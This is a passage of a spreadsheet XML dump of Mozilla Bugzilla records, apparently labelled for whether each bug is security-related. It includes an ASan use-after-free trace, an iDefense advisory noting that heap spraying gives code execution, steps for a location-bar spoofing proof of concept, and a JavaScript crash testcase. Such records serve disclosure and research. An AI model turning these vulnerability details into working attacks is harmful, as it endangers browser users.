    #8 0x7f81e3726183 in nsCOMPtr&lt;nsIContent&gt;::~nsCOMPtr() src/../../dist/include/nsCOMPtr.h:447
    #9 0x7f81e5705272 in nsGenericElement::RemoveChildAt(unsigned int, bool) src/content/base/src/nsGenericElement.cpp:2629
    #10 0x7f81e652dd23 in nsGenericHTMLElement::SetInnerHTML(nsAString_internal const&amp;) src/content/html/content/src/nsGenericHTMLElement.cpp:1338
    #11 0x7f81e666de38 in nsHTMLBodyElement::SetInnerHTML(nsAString_internal const&amp;) src/content/html/content/src/nsHTMLBodyElement.cpp:71
    #12 0x7f81ead19acd in nsIDOMHTMLElement_SetInnerHTML(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, int, JS::Value*) src/objdir-ff-asan-sym/js/xpconnect/src/dom_quickstubs.cpp:14166
    #13 0x7f81f5d61d60 in js::CallJSPropertyOpSetter(JSContext*, int (*)(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, int, JS::Value*), JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, int, JS::Value*) src/js/src/jscntxtinlines.h:463
    #14 0x7f81f5d93bc7 in js::baseops::SetPropertyHelper(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, unsigned int, JS::Value*, int) src/js/src/jsobj.cpp:4906
    #15 0x7f81f5b30601 in js::SetPropertyOperation(JSContext*, unsigned char*, JS::Value const&amp;, JS::Value const&amp;) src/js/src/jsinterpinlines.h:350
    #16 0x7f81f5a5266f in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2319
    #17 0x7f81f59def35 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) src/js/src/jsinterp.cpp:302
    #18 0x7f81f5ae9a99 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:356
    #19 0x7f81f540ff50 in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) src/js/src/jsinterp.h:119
    #20 0x7f81f5aeebfd in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) src/js/src/jsinterp.cpp:388
    #21 0x7f81f52b5bb9 in JS_CallFunctionValue src/js/src/jsapi.cpp:5698
    #22 0x7f81ea3f860e in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) src/js/xpconnect/src/XPCWrappedJSClass.cpp:1436
    #23 0x7f81ea39e508 in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) src/js/xpconnect/src/XPCWrappedJS.cpp:580
    #24 0x7f81eee5b7d0 in PrepareAndDispatch src/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:121
    #25 0x7f81eee58f67 in SharedStub src/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:0
    #26 0x7f81e6256563 in nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsIDOMEventTarget*, unsigned int, nsCxPusher*) src/content/events/src/nsEventListenerManager.cpp:794
    #27 0x7f81e6257a2a in nsEventListenerManager::HandleEventInternal(nsPresContext*, nsEvent*, nsIDOMEvent**, nsIDOMEventTarget*, unsigned int, nsEventStatus*, nsCxPusher*) src/content/events/src/nsEventListenerManager.cpp:867
    #28 0x7f81e63e6f77 in nsEventListenerManager::HandleEvent(nsPresContext*, nsEvent*, nsIDOMEvent**, nsIDOMEventTarget*, unsigned int, nsEventStatus*, nsCxPusher*) src/content/events/src/nsEventListenerManager.h:144
    #29 0x7f81e63d5c16 in nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&amp;, unsigned int, bool, nsCxPusher*) src/content/events/src/nsEventDispatcher.cpp:184
previously allocated by thread T0 here:
    #0 0x4a4452 in __interceptor_malloc ??:0
    #1 0x7f81fbec3717 in moz_xmalloc src/memory/mozalloc/mozalloc.cpp:54
    #2 0x7f81e5972e75 in nsTextNode::CloneDataNode(nsINodeInfo*, bool) const src/content/base/src/nsTextNode.cpp:146
    #3 0x7f81e51f0364 in nsGenericDOMDataNode::Clone(nsINodeInfo*, nsINode**) const src/content/xml/content/src/../../../base/src/nsGenericDOMDataNode.h:216
    #4 0x7f81e5847d53 in nsNodeUtils::CloneAndAdopt(nsINode*, bool, bool, nsNodeInfoManager*, JSContext*, JSObject*, nsCOMArray&lt;nsINode&gt;&amp;, nsINode*, nsINode**) src/content/base/src/nsNodeUtils.cpp:438
    #5 0x7f81e55e92fa in nsNodeUtils::CloneAndAdopt(nsINode*, bool, bool, nsNodeInfoManager*, JSContext*, JSObject*, nsCOMArray&lt;nsINode&gt;&amp;, nsIDOMNode**) src/../../../../dist/include/nsNodeUtils.h:272
    #6 0x7f81e5500755 in nsNodeUtils::Clone(nsINode*, bool, nsNodeInfoManager*, nsCOMArray&lt;nsINode&gt;&amp;, nsIDOMNode**) src/../../../../dist/include/nsNodeUtils.h:145
    #7 0x7f81e5845bf6 in nsNodeUtils::CloneNodeImpl(nsINode*, bool, bool, nsIDOMNode**) src/content/base/src/nsNodeUtils.cpp:360
    #8 0x7f81e51fba6f in nsGenericDOMDataNode::CloneNode(bool, unsigned char, nsIDOMNode**) src/content/xml/content/src/../../../base/src/nsGenericDOMDataNode.h:119
    #9 0x7f81e5979fff in nsTextNode::CloneNode(bool, unsigned char, nsIDOMNode**) src/content/base/src/nsTextNode.h:27
    #10 0x7f81e597df6f in non-virtual thunk to nsTextNode::CloneNode(bool, unsigned char, nsIDOMNode**) asn1cmn.c:0
    #11 0x7f81e58e6539 in nsRange::CloneContents(nsIDOMDocumentFragment**) src/content/base/src/nsRange.cpp:1974
    #12 0x7f81ea6eee9b in nsIDOMRange_CloneContents(JSContext*, unsigned int, JS::Value*) src/objdir-ff-asan-sym/js/xpconnect/src/dom_quickstubs.cpp:18372
    #13 0x7f81f5ae9677 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:387
    #14 0x7f81f5a5dbe8 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2405
    #15 0x7f81f59def35 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) src/js/src/jsinterp.cpp:302
    #16 0x7f81f5ae9a99 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:356
    #17 0x7f81f540ff50 in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) src/js/src/jsinterp.h:119
    #18 0x7f81f5aeebfd in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) src/js/src/jsinterp.cpp:388
    #19 0x7f81f52b5bb9 in JS_CallFunctionValue src/js/src/jsapi.cpp:5698
    #20 0x7f81ea3f860e in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) src/js/xpconnect/src/XPCWrappedJSClass.cpp:1436
    #21 0x7f81ea39e508 in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) src/js/xpconnect/src/XPCWrappedJS.cpp:580
    #22 0x7f81eee5b7d0 in PrepareAndDispatch src/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:121
    #23 0x7f81eee58f67 in SharedStub src/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:0
    #24 0x7f81e6256563 in nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsIDOMEventTarget*, unsigned int, nsCxPusher*) src/content/events/src/nsEventListenerManager.cpp:794
==12811== ABORTING
Stats: 220M malloced (239M for red zones) by 552524 calls
Stats: 82M realloced by 23243 calls
Stats: 178M freed by 294094 calls
Stats: 47M really freed by 74448 calls
Stats: 448M (114755 full pages) mmaped in 112 calls
  mmaps   by size class: 8:425958; 9:57337; 10:16380; 11:16376; 12:3072; 13:2048; 14:1536; 15:384; 16:576; 17:128; 18:224; 19:112; 20:40;
  mallocs by size class: 8:454989; 9:54790; 10:18129; 11:16960; 12:2544; 13:2096; 14:1545; 15:345; 16:590; 17:145; 18:241; 19:112; 20:38;
  frees   by size class: 8:215604; 9:44215; 10:14411; 11:13853; 12:1685; 13:1785; 14:1296; 15:278; 16:518; 17:116; 18:197; 19:102; 20:34;
  rfrees  by size class: 8:64335; 9:3355; 10:2380; 11:3507; 12:193; 13:231; 14:145; 15:39; 16:164; 17:27; 18:21; 19:29; 20:22;
Stats: malloc large: 536 small slow: 2323
Shadow byte and word:
  0x1ff038a24f9e: fd
  0x1ff038a24f98: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ff038a24f78: fd fd fd fd fd fd fd fd
  0x1ff038a24f80: fa fa fa fa fa fa fa fa
  0x1ff038a24f88: fa fa fa fa fa fa fa fa
  0x1ff038a24f90: fd fd fd fd fd fd fd fd
=&gt;0x1ff038a24f98: fd fd fd fd fd fd fd fd
  0x1ff038a24fa0: fa fa fa fa fa fa fa fa
  0x1ff038a24fa8: fa fa fa fa fa fa fa fa
  0x1ff038a24fb0: fd fd fd fd fd fd fd fd
  0x1ff038a24fb8: fd fd fd fd fd fd fd fd</t>
        </is>
      </c>
      <c r="X2591" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2592">
      <c r="A2592" t="n">
        <v>718778</v>
      </c>
      <c r="B2592" t="inlineStr">
        <is>
          <t>2012-01-17 12:09:05 -0800</t>
        </is>
      </c>
      <c r="C2592" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of Firefox 11.0</t>
        </is>
      </c>
      <c r="D2592" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:56 -0700</t>
        </is>
      </c>
      <c r="E2592" t="n">
        <v>1</v>
      </c>
      <c r="F2592" t="n">
        <v>1</v>
      </c>
      <c r="G2592" t="n">
        <v>5</v>
      </c>
      <c r="H2592" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2592" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2592" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K2592" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2592" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2592" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2592" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2592" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2592" t="inlineStr">
        <is>
          <t>[releases]</t>
        </is>
      </c>
      <c r="Q2592" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2592" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2592" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2592" t="n">
        <v>1</v>
      </c>
      <c r="U2592" t="n">
        <v>0</v>
      </c>
      <c r="V2592" t="n">
        <v>30</v>
      </c>
      <c r="W2592" t="inlineStr">
        <is>
          <t>Waiting for "go to build".</t>
        </is>
      </c>
      <c r="X2592" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2593">
      <c r="A2593" t="n">
        <v>596232</v>
      </c>
      <c r="B2593" t="inlineStr">
        <is>
          <t>2010-09-14 08:32:07 -0700</t>
        </is>
      </c>
      <c r="C2593" t="inlineStr">
        <is>
          <t>nsXULTemplateBuilder/nsXULTemplateQueryProcessorXML load new data sources at unsafe time</t>
        </is>
      </c>
      <c r="D2593" t="inlineStr">
        <is>
          <t>2011-03-29 19:25:15 -0700</t>
        </is>
      </c>
      <c r="E2593" t="n">
        <v>1</v>
      </c>
      <c r="F2593" t="n">
        <v>1</v>
      </c>
      <c r="G2593" t="n">
        <v>3</v>
      </c>
      <c r="H2593" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2593" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2593" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K2593" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2593" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2593" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2593" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2593" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2593" t="inlineStr">
        <is>
          <t>[sg:critical?] for 1.9.2 and earlier</t>
        </is>
      </c>
      <c r="Q2593" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2593" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2593" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2593" t="n">
        <v>1</v>
      </c>
      <c r="U2593" t="n">
        <v>0</v>
      </c>
      <c r="V2593" t="n">
        <v>23</v>
      </c>
      <c r="W2593" t="inlineStr">
        <is>
          <t>nsEventDispatcher::Dispatch [content/events/src/nsEventDispatcher.cpp:515]
nsEventDispatcher::DispatchDOMEvent [content/events/src/nsEventDispatcher.cpp:691]
nsDOMEventTargetHelper::DispatchDOMEvent [content/events/src/nsDOMEventTargetHelper.cpp:230]
nsXMLHttpRequest::ChangeState [content/base/src/nsXMLHttpRequest.cpp:3000]
nsXMLHttpRequest::OpenRequest [content/base/src/nsXMLHttpRequest.cpp:1793]
nsXULTemplateQueryProcessorXML::GetDatasource [content/xul/templates/src/nsXULTemplateQueryProcessorXML.cpp:221]
nsXULTemplateBuilder::LoadDataSourceUrls [content/xul/templates/src/nsXULTemplateBuilder.cpp:1365]
nsXULTemplateBuilder::LoadDataSources [content/xul/templates/src/nsXULTemplateBuilder.cpp:1263]
nsXULTemplateBuilder::AttributeChanged [content/xul/templates/src/nsXULTemplateBuilder.cpp:1140]
nsXULContentBuilder::AttributeChanged [content/xul/templates/src/nsXULContentBuilder.cpp:1591]
nsNodeUtils::AttributeChanged [content/base/src/nsNodeUtils.cpp:127]
nsGenericElement::SetAttrAndNotify [content/base/src/nsGenericElement.cpp:4688]
nsGenericElement::SetAttr [content/base/src/nsGenericElement.cpp:4622]
nsGenericElement::SetAttribute [content/base/src/nsGenericElement.cpp:2400]
nsXULElement::SetAttribute [content/xul/content/src/nsXULElement.h:561]
nsIDOMElement_SetAttribute [dom_quickstubs.cpp:4918]
This bug is basically a clone of bug 553808.</t>
        </is>
      </c>
      <c r="X2593" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2594">
      <c r="A2594" t="n">
        <v>1353695</v>
      </c>
      <c r="B2594" t="inlineStr">
        <is>
          <t>2017-04-05 03:45:00 -0700</t>
        </is>
      </c>
      <c r="C2594" t="inlineStr">
        <is>
          <t>execCommand("defaultparagraphseparator", false, "p"); sometimes leads to &lt;enter&gt; being ignored.</t>
        </is>
      </c>
      <c r="D2594" t="inlineStr">
        <is>
          <t>2017-04-18 18:51:36 -0700</t>
        </is>
      </c>
      <c r="E2594" t="n">
        <v>1</v>
      </c>
      <c r="F2594" t="n">
        <v>1</v>
      </c>
      <c r="G2594" t="n">
        <v>3</v>
      </c>
      <c r="H2594" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2594" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2594" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K2594" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2594" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2594" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2594" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2594" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2594" t="inlineStr"/>
      <c r="Q2594" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2594" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2594" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T2594" t="n">
        <v>1</v>
      </c>
      <c r="U2594" t="n">
        <v>0</v>
      </c>
      <c r="V2594" t="n">
        <v>15</v>
      </c>
      <c r="W2594" t="inlineStr">
        <is>
          <t>Created attachment 8854803
Simple HTML page showing the problem
+++ This bug was initially created as a clone of Bug #1297414 +++
See attached HTML document.
Instructions:
1) Click into the gap between the two blockquotes.
2) Hit &lt;enter&gt;
3) Hit &lt;backspace&gt;
4) Hit &lt;enter&gt; - Nothing happens.</t>
        </is>
      </c>
      <c r="X2594" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2595">
      <c r="A2595" t="n">
        <v>622015</v>
      </c>
      <c r="B2595" t="inlineStr">
        <is>
          <t>2010-12-29 16:00:10 -0800</t>
        </is>
      </c>
      <c r="C2595" t="inlineStr">
        <is>
          <t>JavaScript Atom Invalid Index Vulnerability -- iDefense [V-ikgwbx1hqs]</t>
        </is>
      </c>
      <c r="D2595" t="inlineStr">
        <is>
          <t>2011-03-29 19:29:00 -0700</t>
        </is>
      </c>
      <c r="E2595" t="n">
        <v>1</v>
      </c>
      <c r="F2595" t="n">
        <v>1</v>
      </c>
      <c r="G2595" t="n">
        <v>3</v>
      </c>
      <c r="H2595" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2595" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2595" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2595" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2595" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2595" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2595" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2595" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2595" t="inlineStr">
        <is>
          <t>[sg:critical]hardblocker fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q2595" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2595" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2595" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2595" t="n">
        <v>1</v>
      </c>
      <c r="U2595" t="n">
        <v>0</v>
      </c>
      <c r="V2595" t="n">
        <v>23</v>
      </c>
      <c r="W2595" t="inlineStr">
        <is>
          <t>Created attachment 500274
PoC
iDefense VCP Submission V-ikgwbx1hqs
12/29/2010
Mozilla Firefox JavaScript Atom Invalid Index Vulnerability
Description: 
Remote exploitation of a memory corruption vulnerability in Mozilla Organization's FireFox could allow an attacker to execute arbitrary code with the privileges of the current user.
The vulnerability occurs in the JavaScript engine (SpiderMonkey) of Mozilla FireFox. When compiling javascript, the Mozilla engine produces bytecode that is later interpreted in a virtual machine. Strings and other literals (so called atoms) are stored in an atom map. Opcodes that use values from the atom map take a 16 bit immediate constant operand that is used as an index in the atom map array. When more than 64k atoms are used, special handling is required because a 16 bit value would not suffice to address the desired atom. Therefore, the engine frames the opcode with an "indexbaseX" and a "resetbase0" opcode that move the atoms pointer forward and backward respectively. When an exception is thrown in between the indexbase and resetbase opcodes, the atoms pointer does not get reset and the exception object of the catch block is read from an invalid memory address. This results in an exploitable memory corruption vulnerability. 
Analysis: 
Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user viewing the web page. To exploit this vulnerability, a targeted user must load a malicious webpage created by an attacker. An attacker typically accomplishes this via social engineering or injecting content into compromised, trusted sites. After the user visits the malicious web page, no further user interaction is needed.
In order to exploit this vulnerability, it is necessary control various structures at the location of the invalid reference. By performing a heap spray it is possible to populate memory with the needed structures and obtain reliable arbitrary code execution. 
Credit: 
Christian Holler</t>
        </is>
      </c>
      <c r="X2595" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2596">
      <c r="A2596" t="n">
        <v>1228590</v>
      </c>
      <c r="B2596" t="inlineStr">
        <is>
          <t>2015-11-27 06:47:07 -0800</t>
        </is>
      </c>
      <c r="C2596" t="inlineStr">
        <is>
          <t>Location Bar Spoofing Risk - scrollto leads to that the location bar is hidden</t>
        </is>
      </c>
      <c r="D2596" t="inlineStr">
        <is>
          <t>2024-05-30 09:07:27 -0700</t>
        </is>
      </c>
      <c r="E2596" t="n">
        <v>1</v>
      </c>
      <c r="F2596" t="n">
        <v>1</v>
      </c>
      <c r="G2596" t="n">
        <v>6</v>
      </c>
      <c r="H2596" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2596" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J2596" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2596" t="inlineStr">
        <is>
          <t>42 Branch</t>
        </is>
      </c>
      <c r="L2596" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2596" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2596" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2596" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2596" t="inlineStr">
        <is>
          <t>[adv-main44+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2596" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2596" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2596" t="inlineStr">
        <is>
          <t>Firefox 46</t>
        </is>
      </c>
      <c r="T2596" t="n">
        <v>1</v>
      </c>
      <c r="U2596" t="n">
        <v>0</v>
      </c>
      <c r="V2596" t="n">
        <v>42</v>
      </c>
      <c r="W2596" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0
Build ID: 20151029151421
Steps to reproduce:
(I will upload a video in the attachments quickly for show you the steps needed and the real result of this security bug/vulnerability)
Step1 : Go to https://www.alternativ-testing.fr/Research/Mozilla/android/R5fh-Firefox-Android-Risk/poc-spoofing-risk.html
Step2 : Go down into this webpage and go down on this webpage (the location bar normaly disapears) and in the down of this web page , a link named "Open-me in a new tab" .
Step3 : Let pressed on this link and choose the option "Open in a new tab".
Actual results:
--A fake location bar replaces the real location bar.--
Explanation :
The real Location which is normally always visible when you open a new webpage but in this case the Scrollto JavaScript Function makes the Location Bar not visible and leads to a Location Bar URL and SSL Spoofing Risk.
Expected results:
When the scrollto function is used on a webpage which is opened in a new tab , this function shouldn't affect the visibility of the real location Bar</t>
        </is>
      </c>
      <c r="X2596" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2597">
      <c r="A2597" t="n">
        <v>1175793</v>
      </c>
      <c r="B2597" t="inlineStr">
        <is>
          <t>2015-06-17 20:48:00 -0700</t>
        </is>
      </c>
      <c r="C2597" t="inlineStr">
        <is>
          <t>[Hackerplace] fix up styles</t>
        </is>
      </c>
      <c r="D2597" t="inlineStr">
        <is>
          <t>2015-06-17 21:59:08 -0700</t>
        </is>
      </c>
      <c r="E2597" t="n">
        <v>1</v>
      </c>
      <c r="F2597" t="n">
        <v>1</v>
      </c>
      <c r="G2597" t="n">
        <v>6</v>
      </c>
      <c r="H2597" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2597" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J2597" t="inlineStr">
        <is>
          <t>Gaia::Hackerplace</t>
        </is>
      </c>
      <c r="K2597" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2597" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2597" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N2597" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2597" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2597" t="inlineStr">
        <is>
          <t>[spark]</t>
        </is>
      </c>
      <c r="Q2597" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2597" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2597" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2597" t="n">
        <v>1</v>
      </c>
      <c r="U2597" t="n">
        <v>0</v>
      </c>
      <c r="V2597" t="n">
        <v>3</v>
      </c>
      <c r="W2597" t="inlineStr">
        <is>
          <t>We need to handle long app/addon names. And let's center the "Installed" text for addons.</t>
        </is>
      </c>
      <c r="X2597" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2598">
      <c r="A2598" t="n">
        <v>657198</v>
      </c>
      <c r="B2598" t="inlineStr">
        <is>
          <t>2011-05-14 23:18:24 -0700</t>
        </is>
      </c>
      <c r="C2598" t="inlineStr">
        <is>
          <t>TM: "Assertion failure: shape-&gt;previous() == obj-&gt;lastProperty()," with gc</t>
        </is>
      </c>
      <c r="D2598" t="inlineStr">
        <is>
          <t>2013-02-25 16:53:28 -0800</t>
        </is>
      </c>
      <c r="E2598" t="n">
        <v>1</v>
      </c>
      <c r="F2598" t="n">
        <v>1</v>
      </c>
      <c r="G2598" t="n">
        <v>3</v>
      </c>
      <c r="H2598" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2598" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2598" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2598" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2598" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2598" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2598" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2598" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2598" t="inlineStr">
        <is>
          <t>[ccbr][sg:critical?] fixed-in-tracemonkey [qa-]</t>
        </is>
      </c>
      <c r="Q2598" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2598" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2598" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2598" t="n">
        <v>1</v>
      </c>
      <c r="U2598" t="n">
        <v>0</v>
      </c>
      <c r="V2598" t="n">
        <v>29</v>
      </c>
      <c r="W2598" t="inlineStr">
        <is>
          <t>Created attachment 532498
stack
eval("")
o15 = {}
function f11(o) {
    props = Object.getOwnPropertyNames(o)
    prop = props.length ? prop[prop.e] + "" : ""
    o[prop] = 3
}
function f12(o) {
    _someglobal_ = o;
    for (j = 0; j &lt; 5; j++) {
        for (x in {
            x: {
                x: function() {
                    return _someglobal_
                }
            }.x()
        }.x) {
            ({
                x: {
                    x: function() {}
                }.x()
            }[x])
        }
        gc()
    }
} {
    for (i = 0; i &lt; 100; i++) {
        f12(o15)
        f11(o15)
    }
}
asserts js debug shell on TM changeset 599d1c6cba63 with -j at Assertion failure: shape-&gt;previous() == obj-&gt;lastProperty(), setting s-s just-in-case because this involves gc.
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   54718:b079aae53212
user:        Igor Bukanov
date:        Tue Sep 21 14:58:19 2010 +0200
summary:     bug 597736 - fixing TreeFragment leak. r=gal</t>
        </is>
      </c>
      <c r="X2598" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2599">
      <c r="A2599" t="n">
        <v>1136315</v>
      </c>
      <c r="B2599" t="inlineStr">
        <is>
          <t>2015-02-24 11:33:40 -0800</t>
        </is>
      </c>
      <c r="C2599" t="inlineStr">
        <is>
          <t>TEST-UNEXPECTED-FAIL | addon-sdk/tests/test-weak-set.test adding non object or null item | only non-null object are allowed - "true is not a non-null object" matches "/^value is not a non-null object/"</t>
        </is>
      </c>
      <c r="D2599" t="inlineStr">
        <is>
          <t>2015-03-12 09:58:07 -0700</t>
        </is>
      </c>
      <c r="E2599" t="n">
        <v>1</v>
      </c>
      <c r="F2599" t="n">
        <v>1</v>
      </c>
      <c r="G2599" t="n">
        <v>6</v>
      </c>
      <c r="H2599" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2599" t="inlineStr">
        <is>
          <t>Add-on SDK Graveyard</t>
        </is>
      </c>
      <c r="J2599" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2599" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2599" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2599" t="inlineStr">
